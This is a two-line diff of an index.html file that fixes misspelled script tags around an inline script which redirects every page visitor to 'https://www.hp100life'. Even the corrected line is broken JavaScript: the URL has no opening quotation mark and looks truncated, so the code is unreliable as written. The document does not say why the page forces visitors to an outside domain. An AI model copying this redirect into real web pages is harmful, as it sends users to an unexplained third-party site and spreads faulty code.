--- a/index.html
+++ b/index.html
@@ -1,2 +1,2 @@
-<scriot type="text/javascript">location.href=https://www.hp100life";<script>
+<script type="text/javascript">location.href=https://www.hp100life";</script>
   
